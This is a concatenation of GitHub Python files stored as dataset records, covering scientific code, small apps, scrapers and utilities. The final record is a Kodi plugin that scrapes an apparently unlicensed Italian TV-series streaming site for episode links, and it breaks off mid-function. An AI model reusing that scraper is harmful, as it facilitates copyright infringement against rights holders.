jnp.sin(angle))\n jac = jac + jnp.log(b2)\n\n # Merge everything back together\n x = jnp.concatenate([cart_coords, int_coords], axis=-1)\n\n # Permute back into atom order\n x = x[..., self.permute_inv]\n\n # Run through inverse internal coordinate transform\n x, new_jac = self.ic_transform.inverse(x)\n jac = jac + new_jac\n\n return x, jac\n\n def _convert_last_internal(self, x):\n p1 = x[..., :3]\n p2 = x[..., 3:6]\n p3 = x[..., 6:9]\n p21 = p2 - p1\n p31 = p3 - p1\n b1 = jnp.linalg.norm(p21, axis=-1)\n b2 = jnp.linalg.norm(p31, axis=-1)\n cos_angle = jnp.sum((p21) * (p31), axis=-1) / b1 / b2\n angle = jnp.arccos(cos_angle)\n return b1, b2, angle","repo_name":"lollcat/se3-augmented-coupling-flows","sub_path":"eacf/utils/coordinate_transform/internal.py","file_name":"internal.py","file_ext":"py","file_size_in_byte":18885,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"29276147921","text":"import os\nfrom Bio import SeqIO\nfrom LoadFile import LoadFile\n\n\ndef test_dna_reads_list(f):\n print('Checking the DNA-seq list...')\n # the file should exist\n assert os.path.isfile(f), 'DNA-seq list \"{}\" not found'.format(f)\n with LoadFile(f) as fh:\n for line in fh.readlines():\n # the two columns\n d = line.strip().split('\\t')\n assert len(d) == 2\n print(d[0])\n # the files should be paired\n r_pair_files = d[1].split(',')\n # the listed paths should exist\n assert os.path.isfile(r_pair_files[0])\n assert os.path.isfile(r_pair_files[1])\n\n return(0)\n\n\ndef test_rna_reads_list(f):\n print('Checking the RNA-seq list...')\n # the file should exist\n assert os.path.isfile(f)\n with LoadFile(f) as fh:\n for line in fh.readlines():\n # the two columns\n d = line.strip().split('\\t')\n assert len(d) == 2\n print(d[0])\n # the files should be paired\n r_file = d[1]\n # the listed paths should exist\n assert os.path.isfile(r_file)\n return(0)\n\n\ndef test_reference_seq(f):\n print('Checking the reference sequences...')\n # the file should exist\n assert os.path.isfile(f), 'Reference genome file \"{}\" not found'.format(f)\n\n # ensure encoding method\n fh = LoadFile(f)\n\n # ensure a single sequence formatted in fasta\n seq_dict = SeqIO.to_dict(SeqIO.parse(fh, 'fasta'))\n assert len(seq_dict) == 1\n\n fh.close()\n\n return(0)\n\n\ndef test_functions(funcs_d):\n # choices\n choices_dict = {'denovo': ['Y', 'N'],\n 'snps': ['Y', 'N'],\n 'expr': ['Y', 'N'],\n 'phylo': ['Y', 'N'],\n 'de': ['Y', 'N'],\n 'ar': ['Y', 'N']}\n\n for k in funcs_d:\n # ensure understoodable function\n assert k in choices_dict\n # ensure the choice\n assert funcs_d[k] in choices_dict[k]\n\n return(0)\n","repo_name":"hzi-bifo/seq2geno","sub_path":"main/ArgsTest.py","file_name":"ArgsTest.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"4491127983","text":"\nfrom traits.api import \\\n Array, Bool, Enum, Float, HasTraits, \\\n HasStrictTraits, \\\n Instance, Int, Trait, Str, Enum, \\\n Callable, List, TraitDict, Any, Range, \\\n Delegate, Event, on_trait_change, Button, \\\n Interface, Property, cached_property, WeakRef, Dict\n\nfrom traitsui.api import \\\n Item, View, HGroup, ListEditor, VGroup, \\\n HSplit, Group, Handler, VSplit\n\nfrom traitsui.menu import \\\n NoButtons, OKButton, CancelButton, \\\n Action\n\nfrom numpy import zeros, float_\n\n\nclass ITStepperEval(Interface):\n\n \"\"\"\n Interface for time step evaluators (ITStepperEvalE).\n\n Each time stepper classes implement the methods evaluating the\n governing equations of the simulated problem at a discrete time\n instance t.\n \"\"\"\n\n def get_state_array_size(self):\n \"\"\"\n Get the size of the state array.\n\n The state array is really an array of floating point numbers.\n Anything else should be used to represent the physical\n object's state.\n \"\"\"\n\n def setup(self, sctx):\n '''\n Setup the state array and spatial context to be operated on.\n '''\n\n def get_corr_pred(self, sctx, u, tn, tn1):\n '''\n Return the corrector and predictor for supplied control variable.\n '''\n","repo_name":"simvisage/bmcs","sub_path":"ibvpy/core/i_tstepper_eval.py","file_name":"i_tstepper_eval.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"70310314989","text":"#!/usr/local/bin/python3\n# check_string.py\n#\n\"\"\" Checks if an input string is upper case and ends with a period.\nNotifies if either, neither or both of these clauses are met. \"\"\"\n\ninput_str = input(\"Enter an uppercase string ending with a period: \")\n\nperiod = input_str.endswith('.')\nup = input_str.isupper()\n\nif period and up:\n print(\"Input meets both requirements.\")\nelse:\n if not period:\n print(\"Input does not end with a period.\")\n if not up:\n print(\"Input is not all upper case.\")","repo_name":"CarlosMontesTD/OST_Homework","sub_path":"python1/check_string.py","file_name":"check_string.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72467957547","text":"#!/usr/bin/env python3 \n\nimport rospy\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image as Img\nimport numpy as np\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom PIL import Image\n\ni = 0\navg = np.zeros(5)\nroot='/home/david'\n\ndef convert_depth_image(ros_image):\n bridge = CvBridge()\n global i\n depth_image = bridge.imgmsg_to_cv2(ros_image, desired_encoding=\"passthrough\")\n depth_array = np.array(depth_image, dtype=np.float32)\n im = Image.fromarray(depth_array)\n im = im.convert(\"L\")\n idx = str(i).zfill(4)\n #im.save(root+\"/depth/frame{index}.png\".format(index = idx))\n \n min_distance = 10000000\n max_distance = 0\n\n sub = depth_image[101:525,76:370]\n for x in range(sub.shape[0]):\n for y in range(sub.shape[1]):\n if sub[x, y] < min_distance:\n min_distance = sub[x, y]\n if sub[x, y] > max_distance:\n max_distance = sub[x, y]\n\n avg[i] = max_distance\n\n i += 1\n\n if i == 5:\n max_distance = avg.min()\n print(f'{min_distance} {max_distance}')\n i = 0\n if max_distance < 1100:\n print(\"Danger\")\n else:\n print(\"Clear\")\n\n \n\ndef callback(data):\n imgW = 640 * 2\n imgH = 480\n #print(rospy.get_caller_id() + \"I heard %s\", data.data)\n # imgD = np.reshape(data.data(1:2:end),imgW,imgH))\n # imgC = np.reshape(data.data(2:2:end),imgW,imgH))\n # print(len(data.data))\n # arry = np.array(data.data)\n # imgD = np.reshape(arry, (imgW, imgH))\n # print(imgD.shape)\n convert_depth_image(data)\n\n exit()\n #imgCombined = imgCx2^8 + imgD;\n \ndef listener():\n\n # In ROS, nodes are uniquely named. If two nodes with the same\n # name are launched, the previous one is kicked off. The\n # anonymous=True flag means that rospy will choose a unique\n # name for our 'listener' node so that multiple listeners can\n # run simultaneously.\n rospy.init_node('listener', anonymous=True)\n\n rospy.Subscriber(\"/camera/depth/image_rect_raw\", Img, callback)\n\n # spin() simply keeps python from exiting until this node is stopped\n rospy.spin()\n\nif __name__ == '__main__':\n print(\"Startup\")\n listener()","repo_name":"sprenkle/piece_detector","sub_path":"scripts/l515.py","file_name":"l515.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41587484367","text":"import xml.etree.ElementTree as etree\nfor i in range(11):\n tree = etree.parse('d://Keywords/news{}.xml'.format(i))\n print('\\nd://Keywords/news{}.xml'.format(i))\n root = tree.getroot()\n\n res = dict()\n for e in root.findall('.//ana'):\n word = e.attrib['lex']\n if word in res:\n res[word] += 1\n else:\n res[word] =1\n words = list(res.keys())\n for w in words:\n if res[w] <= 2:\n del res[w]\n res1 = [[w,res[w]] for w in res]\n print(res)\n \n","repo_name":"ryavorsky/MoscowPlus","sub_path":"xmlparse.py","file_name":"xmlparse.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73551629867","text":"from selenium import webdriver\r\nimport time\r\nimport streamlit as st\r\nfrom bs4 import BeautifulSoup as soup\r\n\r\n# Replace with your chromedriver.exe path\r\ndriver = webdriver.Chrome(executable_path='C:/Users/nitro 5/Downloads/chromedriver.exe')\r\n\r\n# Website from which nifty50 price will be scraped\r\nurl = 'https://finance.yahoo.com/quote/%5ENSEI/'\r\ndriver.get(url)\r\n\r\nst.set_page_config(\r\n page_title = 'Real-Time Dashboard',\r\n page_icon = '✅',\r\n layout = 'wide'\r\n)\r\nst.title(\"Nifty50 Live Dashboard\")\r\nst.write('---')\r\n\r\nplaceholder = st.empty()\r\n\r\nwhile 1:\r\n html = driver.page_source\r\n page_soup = soup(html,features=\"lxml\")\r\n nifty50 = page_soup.find(\"div\", {\"class\": \"D(ib) Mend(20px)\"}).text\r\n my_list = nifty50.split()\r\n print(my_list)\r\n nifty50_price = my_list[0].split('+')[0]\r\n nifty50_time = my_list[3][0:5]\r\n\r\n with placeholder.container():\r\n price1, price2 = st.columns(2)\r\n price1.metric(label='Price', value=nifty50_price)\r\n price2.metric(label='Time', value=nifty50_time)\r\n\r\n time.sleep(1)\r\n","repo_name":"Hiten-98/Nifty50-Dashboard-Live-Price-Updates-with-Streamlit","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1311313945","text":"from flask import Flask, render_template\nimport sqlite3\n\napp = Flask(__name__)\n\ndatabase = 'products.db'\n\n\n@app.route('/')\ndef show_categories():\n categories = []\n con = sqlite3.connect(database)\n con.row_factory = sqlite3.Row\n\n cur = con.cursor()\n cur.execute('SELECT name FROM categories')\n for row in cur:\n categories.append(row)\n\n con.close()\n\n return render_template('index.html', categories=categories)\n\n\n@app.route('/')\ndef show_product_list(category):\n products_list = []\n con = sqlite3.connect(database)\n cur = con.cursor()\n category_id = (cur.execute('SELECT category_id FROM categories WHERE name = ?', [category])).fetchone()\n\n products = (cur.execute('SELECT products.name, product_id '\n 'FROM products '\n 'INNER JOIN categories on products.category = categories.category_id '\n 'WHERE products.category = ?', [category_id[0]])).fetchall()\n\n for product in products:\n product_details = {\n 'name': product[0],\n 'product_id': product[1]\n }\n products_list.append(product_details)\n\n con.close()\n\n return render_template('product_list.html', products_list=products_list)\n\n\n@app.route('/product/<_id>')\ndef show_product_details(_id):\n con = sqlite3.connect(database)\n cur = con.cursor()\n sql_query = 'SELECT products.name, in_stock, price, qty, categories.name ' \\\n 'FROM products ' \\\n 'INNER JOIN categories on products.category = categories.category_id ' \\\n 'WHERE product_id = ?'\n product = cur.execute(sql_query, [_id])\n return render_template('product_details.html', product=product)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"AnatoliyRozit/itea_python_advanced","sub_path":"08/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18924635082","text":"# https://leetcode.com/problems/reverse-linked-list\n\n# Solution\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n if head == None:\n return head\n \n reverseLinkedList = None\n tempNode = None\n\n while (head != None):\n # extract one node from starting in temporary node\n tempNode = head\n head = head.next\n\n # add one node in reverse list.\n tempNode.next = reverseLinkedList\n reverseLinkedList = tempNode\n\n return reverseLinkedList\n","repo_name":"rupanshugoyal/leetcode","sub_path":"Python/Easy/reverse-linked-list.py","file_name":"reverse-linked-list.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21038305370","text":"from PIL import Image\nimport os\nimport imagehash\nimport distance\nimport pytesseract\nimport database\nimport numpy as np\n\n\nclass ImageProcessor:\n \"\"\"\n HALLO Image processor\n \"\"\"\n\n def is_image(self, filename):\n \"\"\"\n Check if given filename is an image\n noinspection PyMethodMayBeStatic\n :param filename:\n :return:\n \"\"\"\n\n f = filename.lower()\n return f.endswith(\".png\") or f.endswith(\".jpg\") or \\\n f.endswith(\".jpeg\") or f.endswith(\".bmp\") or \\\n f.endswith(\".gif\") or '.jpg' in f or f.endswith(\".svg\")\n\n def create_hash(self, image):\n \"\"\"\n Create 3 hashes of the image\n noinspection PyMethodMayBeStatic\n :param image:\n :return:\n \"\"\"\n\n hash = str(imagehash.phash(image, 16))\n dhash = str(imagehash.dhash(image, 16))\n dhash_v = str(imagehash.dhash_vertical(image, 16))\n\n return [hash, dhash, dhash_v]\n\n def image_to_text(self, image):\n \"\"\"\n Use OCR to read the text on the image\n used for scanning memes\n noinspection PyMethodMayBeStatic\n :param image:\n :return:\n \"\"\"\n\n return pytesseract.image_to_string(image)\n\n def calculate_ham_dist(self, hash_str, hash_str2):\n \"\"\"\n Calculates the hamming distance of two strings\n and converts it into a similarity percentage\n noinspection PyMethodMayBeStatic\n :param hash_str:\n :param hash_str2:\n :return:\n \"\"\"\n\n dist = distance.hamming(hash_str, hash_str2)\n\n percentage = round((100 - ((64 / 100) * dist)), 2)\n\n return percentage\n\n def compare_image(self, hashes, image_hash):\n \"\"\"\n Function will create 3 different hashes of the given image and\n calculate the hamming distance between the given hashes the result\n will be an array of the similarity percentage of each hash\n :param hashes:\n :param image_hash:\n :return:\n \"\"\"\n\n phash_dist = self.calculate_ham_dist(hashes[0], image_hash[0])\n dhash_dist = self.calculate_ham_dist(hashes[1], image_hash[1])\n dhash_v_dist = self.calculate_ham_dist(hashes[2], image_hash[2])\n\n # Calculate total percentage of all hashes\n total_percentage = round((phash_dist + dhash_dist + dhash_v_dist) / 3)\n\n return [phash_dist, dhash_dist, dhash_v_dist, total_percentage]\n\n # noinspection PyMethodMayBeStatic\n def compare_text(self, text, text2):\n \"\"\"\n Calculate the similarity percentage between two strings using levenshtein\n :param text:\n :param text2:\n :return:\n \"\"\"\n\n if text is None:\n text = \"\"\n\n if text2 is None:\n text2 = \"\"\n\n # Get the length of the longest string\n text_len = max([len(text), len(text2)])\n # Calculate the difference between the two texts\n text_dist = distance.levenshtein(text, text2)\n # Convert the difference into a percentage\n percentage = round((100 - ((text_len / 100) * text_dist)), 2)\n\n return percentage\n\n def add_image(self, image_path, message_id):\n \"\"\"\n Generate hashes of the given image and add them to the DB\n :param image_path:\n :param message_id:\n :return:\n \"\"\"\n\n image = Image.open(image_path)\n image_hashes = self.create_hash(image)\n image_text = self.image_to_text(image)\n image_text = (''.join([c for c in image_text if c not in [' ', '\\t', '\\n']]))\n\n res = database.add_image(\n image_hashes[0],\n image_hashes[1],\n image_hashes[2],\n os.path.basename(image_path),\n message_id,\n image_text\n )\n\n return res\n\n def sort_res_array(self, x, column=None, flip=False):\n \"\"\"\n Will sort the response array based on the given column and order\n :param x:\n :param column:\n :param flip:\n :return:\n \"\"\"\n\n x = x[np.argsort(x[:, column])]\n if flip:\n x = np.flip(x, axis=0)\n return x\n\n def repost_check(self, image, total_img_perc, txt_perc):\n \"\"\"\n Function will compare all hashes in the DB with the hashes of the given image\n it will then return all images meeting the given threshold\n :param image:\n :param total_img_perc:\n :param txt_perc:\n :return:\n \"\"\"\n\n image_hashes = self.create_hash(image)\n all_images = database.get_all_images()\n\n found = []\n\n if txt_perc > 0:\n # OCR the image for any text\n image_text = self.image_to_text(image)\n # Remove any spaces, enters etc.\n image_text = (''.join([c for c in image_text if c not in [' ', '\\t', '\\n']]))\n else:\n image_text = \"\"\n\n for img in all_images:\n dist_perc_res = self.compare_image([img[0], img[1], img[2]], image_hashes)\n\n # Check if the total percentage is greater than the minimum required value\n if dist_perc_res[3] > total_img_perc:\n if txt_perc > 0:\n dist_perc_txt = self.compare_text(image_text, img[6])\n\n # Check if the text similarity percentage is greater than the set threshold\n if dist_perc_txt > txt_perc:\n return_data = img + (dist_perc_res[3], dist_perc_txt)\n found.append(return_data)\n else:\n return_data = img + (dist_perc_res[3], 0)\n found.append(return_data)\n\n if len(found) > 0:\n found_arr = np.asarray(found)\n res_array = self.sort_res_array(found_arr, column=7, flip=True).tolist()\n return res_array\n else:\n return False\n","repo_name":"jdaan/python-image-video-hasher","sub_path":"imageprocessor/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72085504427","text":"import logging\nimport random\nfrom psycopg2 import InternalError, IntegrityError, connect\n\nconn = connect(\"dbname=postgres user=postgres\")\ncursor = conn.cursor()\n\ncursor.execute(\"select max(user_id), min(user_id) from raw_data;\")\ncount = cursor.fetchone()\n\nif count:\n rnd_ids = ','.join([str(random.randint(count[1], count[0])) for i in range(1, 11)])\n cursor.execute(\n f\"SELECT count(user_id) FROM agg_data as AD \"\n f\"where user_id in ({rnd_ids}) group by user_id \"\n f\"having balance = (select sum(amount) from raw_data where user_id = AD.user_id group by user_id) and \"\n f\"event_number = (select count(event_id) from raw_data where user_id = AD.user_id group by user_id) and \"\n f\"best_event_id = (\"\n f\"select event_id from raw_data where user_id = AD.user_id group by event_id order by max(amount) desc limit 1\"\n f\") and \"\n f\"worst_event_id = (\"\n f\"select event_id from raw_data where user_id = AD.user_id group by event_id order by min(amount) desc limit 1\"\n f\")\"\n )\n rows = cursor.fetchall()\n\n if len(rows) != 10:\n logging.warning(\"Data is not valid.\")\n else:\n logging.warning(\"Data is valid.\")\n\ncursor.close()\nconn.close()\n","repo_name":"HaideiGV/db_aggregator","sub_path":"db_validate.py","file_name":"db_validate.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15515538998","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nFecha de creación: Tue Oct 20 17:01:06 2015\n\nCreado por: antalcides\n\"\"\"\ndef heun(f,x0,y0,h,m): \n u=[] \n v=[] \n for i in range(m): \n k1=h*f(x0,y0) \n k2=h*f(x0+h,y0+k1) \n y0=y0+0.5*(k1+k2) \n x0=x0+h \n u=u+[x0] \n v=v+[y0]\n return [u,v]\nfrom pylab import* \ndef f(x,y):\n return (y - x**2 + x + 1) \n[u,v]=heun(f,0,1,0.1,20)\ndef y(x):return exp(x) +x**2 + x #solución\nx=arange(0,2.1,0.1)\nplot(x,y(x),'--xb')\nplot(u,v,'or') \n\nlegend((r'$Anal\\'{\\i}tica$',r'$Heun$'))\ngrid(True) \nshow()\n\n","repo_name":"antalcides/migit","sub_path":"py/ode_heun.py","file_name":"ode_heun.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38803315445","text":"from calendar import month\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nfrom constants import LINE_GROUP_LINK\n\nfrom main import aachen_an, aachen_permit\n\nsched = BlockingScheduler(timezone=\"Europe/Berlin\")\n\n# @sched.scheduled_job('interval', seconds=30)\n# def timed_job(): \n# aachen_an('2023', '01')\n# # aachen_permit()\n\n# def timed_job(year, month):\n# aachen_an(year, month)\n\ndef welcome():\n print('Welcome to use Aachen Anmeldung Termin Alert!') \n print('Note: The script only notifys appointments from Bahnhofplatz Katschhof. \\nLink: https://qtermin.de/BahnhofplatzKatschhof')\n print('=======================================================================')\n print('- Steps:')\n print('1. Join the line group in order to receive alerting messages')\n print('https://imgur.com/a8huKXY.jpg') \n print(LINE_GROUP_LINK) \n print('2. Enter the year and the month(two digits) in which you wish to have an appointment. For example, year:2023, month:01')\n\ndef get_input_year():\n year=None\n while True: \n year=input(\"Year:\")\n if year.isdigit() and len(str(year)) == 4: \n return year\n else:\n print(\"Enter a valid year\") \n\ndef get_input_month():\n month=None\n while True: \n month=input(\"Month:\")\n if month in {\"01\",\"02\",\"03\",\"04\",\"05\",\"06\",\"07\",\"08\",\"09\",\"10\",\"11\",\"12\"}: \n return month\n else:\n print(\"Enter 01, 02, 03, ... , 12\")\n\n\nif __name__ == \"__main__\":\n welcome()\n year,month=get_input_year(),get_input_month()\n sched.add_job(aachen_an, \"cron\", args=[year, month], second=\"*/30\")\n sched.start()","repo_name":"noworneverev/aachen-termin-alert","sub_path":"clock.py","file_name":"clock.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22077990205","text":"\"\"\"\n709. To Lower Case\n\nImplement function ToLowerCase() that has a string parameter str, and returns the same string in lowercase.\n\nExample 1:\n\nInput: \"Hello\"\nOutput: \"hello\"\n\nExample 2:\n\nInput: \"here\"\nOutput: \"here\"\n\nExample 3:\n\nInput: \"LOVELY\"\nOutput: \"lovely\"\n\"\"\"\n\n\nclass Solution:\n\n def toLowerCase(self, s: str) -> str:\n # str.lower()\n # ''.join([chr(ord(i) + 32) if i.isupper() else i for i in str])\n for i, v in enumerate(s):\n print(i, v)\n s = s[:i] + v.lower() + s[i + 1:]\n return s\n\n\nF = Solution()\nprint(F.toLowerCase('Hikari'))\n","repo_name":"homurax/leetcode","sub_path":"Algorithms/Python/easy/0709_To_Lower_Case_[Easy].py","file_name":"0709_To_Lower_Case_[Easy].py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"22668308182","text":"import numpy as np\nimport torch\nimport torch.utils.data as Data\nimport matplotlib.pyplot as plt\nimport torch.nn as nn\n\n\ndef find_deep_params(x1):\n '''\n 这部分作用是返回各个属性上取值的个数和取值的个数,并且对train_x进行处理\n 转化为索引矩阵\n :param x2: 测试数据\n :param x1:训练数据\n :return: 变更后的train_x,一共有多少个特征,每个特征上有多少个取值\n '''\n # print(x1.shape)\n # print(x2.shape)\n x1 = np.array(x1)\n size_1, field_size = x1.shape\n # size_2, field_size = x2.shape\n X = np.zeros((size_1, field_size))\n X[:size_1] = x1\n n, field_size = X.shape\n feat_sizes = []\n # 保存每个属性每个值对应的索引\n dic, cnt = {}, 0\n for i in range(field_size):\n feat_sizes.append(np.unique(X[:, i]).shape[0])\n l = np.unique(X[:, i]).tolist()\n for val in l:\n # 每一列上每个元素都有其对应的索引值\n dic[i, val] = cnt\n cnt += 1\n for j in range(field_size):\n for i in range(n):\n val = X[i][j]\n X[i][j] = dic[j, val]\n return X, field_size, feat_sizes\n\n\ndef train(model, x, y, num_epoch=50, lr=3e-4, print_every=5, plot_every=5):\n '''\n 训练过程\n :param model: 模型\n :param x:\n :param y:\n :param num_epoch:\n :param lr:\n :param print_every:\n :param plot_every:\n :return:\n '''\n cri = nn.BCELoss(reduction='sum')\n opt = torch.optim.Adam(lr=lr, params=model.parameters())\n data_set = Data.TensorDataset(x, y)\n data_loader = Data.DataLoader(dataset=data_set, batch_size=x.shape[0] // 5, shuffle=True, ) # num_workers=-1)\n losses = []\n for epoch in range(num_epoch):\n total_loss = 0\n for step, (batch_x, batch_y) in enumerate(data_loader):\n opt.zero_grad()\n outputs = model(batch_x)\n loss = cri(outputs, batch_y)\n loss.backward()\n opt.step()\n total_loss += loss.item()\n if epoch % print_every == 0:\n print('epoch:{},loss:{:.2f}'.format(epoch, total_loss / x.shape[0]))\n if epoch % plot_every == 0:\n losses.append(total_loss / x.shape[0])\n plt.plot(losses, ls='--', color='r')\n plt.scatter(list(range(len(losses))), losses, color='b')\n plt.show()\n","repo_name":"Xiaoctw/PYTORCH","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18533326258","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------\n# streamondemand.- XBMC Plugin\n# Canale piratestreaming\n# http://www.mimediacenter.info/foro/viewforum.php?f=36\n# ------------------------------------------------------------\nimport re\nimport urlparse\n\nfrom core import config, httptools\nfrom platformcode import logger\nfrom core import scrapertools\nfrom core import servertools\nfrom core.item import Item\nfrom core.tmdb import infoSod\n\n__channel__ = \"italiaserie\"\n\nhost = \"http://www.italiaserie.co\"\n\n\ndef mainlist(item):\n logger.info(\"streamondemand.italiaserie mainlist\")\n itemlist = [Item(channel=__channel__,\n title=\"[COLOR azure]Aggiornamenti Serie TV[/COLOR]\",\n action=\"peliculas\",\n url=host,\n thumbnail=\"http://orig03.deviantart.net/6889/f/2014/079/7/b/movies_and_popcorn_folder_icon_by_matheusgrilo-d7ay4tw.png\"),\n Item(channel=__channel__,\n title=\"[COLOR azure]Ultimi Episodi[/COLOR]\",\n action=\"latestep\",\n url=\"%s/aggiornamento-episodi/\" % host,\n thumbnail=\"http://orig03.deviantart.net/6889/f/2014/079/7/b/movies_and_popcorn_folder_icon_by_matheusgrilo-d7ay4tw.png\"),\n Item(channel=__channel__,\n title=\"[COLOR yellow]Cerca...[/COLOR]\",\n action=\"search\",\n extra=\"serie\",\n thumbnail=\"http://dc467.4shared.com/img/fEbJqOum/s7/13feaf0c8c0/Search\")]\n return itemlist\n\ndef newest(categoria):\n logger.info(\"[italiaserie.py]==> newest\" + categoria)\n itemlist = []\n item = Item()\n try:\n if categoria == \"series\":\n item.url = \"%s/aggiornamento-episodi/\" % host\n item.action = \"latestep\"\n itemlist = latestep(item)\n\n if itemlist[-1].action == \"latestep\":\n itemlist.pop()\n\n # Continua la ricerca in caso di errore \n except:\n import sys\n for line in sys.exc_info():\n logger.error(\"{0}\".format(line))\n return []\n\n return itemlist\n\ndef latestep(item):\n itemlist = []\n \n data = httptools.downloadpage(item.url).data\n blocco = scrapertools.find_single_match(data, r'

\\s*

(.*?)

 

')\n patron = r'([^<]+)\\s*\\(([^)]+)\\)'\n matches = re.compile(patron, re.DOTALL).findall(blocco)\n\n for scrapedurl, scrapedtitle, scrapedepandlang in matches:\n scrapedtitle = scrapertools.decodeHtmlentities(scrapedtitle)\n scrapedepandlang = scrapertools.decodeHtmlentities(scrapedepandlang.replace('×', 'x'))\n seasonandep = scrapertools.find_single_match(scrapedepandlang, r'(\\d+x[0-9\\-?]+)')\n lang = scrapedepandlang.replace(seasonandep, \"\").strip()\n extra = r'%s(.*?)'\n \n # Multi Ep\n if '-' in scrapedepandlang:\n season = scrapertools.find_single_match(scrapedepandlang, r'(\\d+x)')\n scrapedepandlang = scrapedepandlang.split('-')\n for ep in scrapedepandlang:\n ep = (season + ep if season not in ep else ep).replace(lang, \"\")\n completetitle = \"%s (%s %s)\" % (scrapedtitle, ep, lang)\n\n itemlist.append(infoSod(\n Item(channel=__channel__,\n action=\"findepvideos\",\n title=completetitle,\n contentSerieName=completetitle,\n fulltitle=scrapedtitle,\n url=scrapedurl,\n extra=\"%s (%s)\" % (extra, (ep.replace('x', '×').replace(lang, '').strip())),\n folder=True), tipo='tv'))\n continue\n \n # Ep singolo\n extra = extra % (scrapedepandlang.replace('x', '×').replace(lang, '').strip())\n completetitle = \"%s (%s)\" % (scrapedtitle, scrapedepandlang)\n itemlist.append(infoSod(\n Item(channel=__channel__,\n action=\"findepvideos\",\n title=completetitle,\n contentSerieName=completetitle,\n fulltitle=scrapedtitle,\n url=scrapedurl,\n extra=extra,\n folder=True), tipo='tv'))\n\n return itemlist\n\ndef peliculas(item):\n logger.info(\"streamondemand.italiaserie peliculas\")\n itemlist = []\n\n # Carica la pagina \n data = httptools.downloadpage(item.url).data\n\n # Estrae i contenuti \n patron = '
\\s*\\s*]+>'\n matches = re.compile(patron, re.DOTALL).findall(data)\n\n for scrapedurl, scrapedtitle, scrapedthumbnail in matches:\n scrapedplot = \"\"\n scrapedtitle = scrapertools.decodeHtmlentities(scrapedtitle)\n scrapedurl = scrapedurl.replace(\"-1/\", \"-links/\")\n\n itemlist.append(infoSod(\n Item(channel=__channel__,\n action=\"episodios\",\n fulltitle=scrapedtitle,\n show=scrapedtitle,\n title=\"[COLOR azure]\" + scrapedtitle + \"[/COLOR]\",\n url=scrapedurl,\n thumbnail=scrapedthumbnail,\n plot=scrapedplot,\n folder=True), tipo='tv'))\n\n # Paginazione \n patronvideos = ''\n matches = re.compile(patronvideos, re.DOTALL).findall(data)\n\n if len(matches) > 0:\n scrapedurl = urlparse.urljoin(item.url, matches[0])\n itemlist.append(\n Item(channel=__channel__,\n action=\"HomePage\",\n title=\"[COLOR yellow]Torna Home[/COLOR]\",\n folder=True)),\n itemlist.append(\n Item(channel=__channel__,\n action=\"peliculas\",\n title=\"[COLOR orange]Successivo >>[/COLOR]\",\n url=scrapedurl,\n thumbnail=\"http://2.bp.blogspot.com/-fE9tzwmjaeQ/UcM2apxDtjI/AAAAAAAAeeg/WKSGM2TADLM/s1600/pager+old.png\",\n folder=True))\n\n return itemlist\n\n\ndef HomePage(item):\n import xbmc\n xbmc.executebuiltin(\"ReplaceWindow(10024,plugin://plugin.video.streamondemand)\")\n\n\ndef search(item, texto):\n logger.info(\"[italiaserie.py] \" + item.url + \" search \" + texto)\n item.url = host + \"/?s=\" + texto\n try:\n return peliculas(item)\n # Continua la ricerca in caso di errore \n except:\n import sys\n for line in sys.exc_info():\n logger.error(\"%s\" % line)\n return []\n\n\ndef episodios(item):\n def load_episodios(html, item, itemlist, lang_title):\n patron = '((?:.*?]+>[^<][^<]+<(?:b|\\/)[^>]+>)+)'\n matches = re.compile(patron).findall(html)\n for data in matches:\n # Estrazione\n scrapedtitle = data.split(']*>', '', scrapedtitle).strip()\n if scrapedtitle != 'Categorie':\n scrapedtitle = scrapedtitle.replace('×', 'x')\n scrapedtitle = scrapedtitle.replace('×', 'x')\n itemlist.append(\n Item(channel=__channel__,\n action=\"findvideos\",\n contentType=\"episode\",\n 